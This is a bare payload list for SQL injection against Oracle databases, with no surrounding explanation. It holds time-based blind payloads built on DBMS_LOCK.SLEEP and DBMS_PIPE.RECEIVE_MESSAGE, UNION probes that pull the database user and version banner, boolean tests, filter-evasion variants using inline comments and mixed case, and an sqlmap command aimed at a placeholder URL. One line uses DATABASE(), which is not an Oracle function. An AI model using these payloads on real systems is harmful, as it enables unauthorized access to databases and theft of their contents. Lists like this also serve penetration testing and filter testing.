' OR 1=1 AND DBMS_LOCK.SLEEP(5)--
' OR CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END--
' OR 1=1 AND DBMS_PIPE.RECEIVE_MESSAGE('SQLMAP',5) IS NULL--
' OR CASE WHEN (SELECT LENGTH(USER) FROM DUAL) > 0 THEN DBMS_PIPE.RECEIVE_MESSAGE('SQLMAP',5) ELSE NULL END--
' OR CASE WHEN (SUBSTR(BANNER, 1, 2) = '12') THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM V$VERSION--
' OR CASE WHEN (USER = 'SYS') THEN DBMS_LOCK.SLEEP(5) ELSE NULL END--
' OR CASE WHEN (ASCII(SUBSTR(DATABASE(), 1, 1)) > 80) THEN DBMS_LOCK.SLEEP(5) ELSE NULL END--
sqlmap -u "http://example.com/vulnerable?param=1" --dbms=oracle --time-sec=5 --technique=T
' UNION SELECT USER FROM DUAL--
' UNION SELECT BANNER FROM V$VERSION WHERE ROWNUM = 1--
' AND 1=0--
' AND (USER='SYS')--
' UNION SELECT NULL, USER, NULL FROM DUAL--
'/**/OR/**/1=1--
'uNiOn SeLeCt UsEr FrOm dUaL--
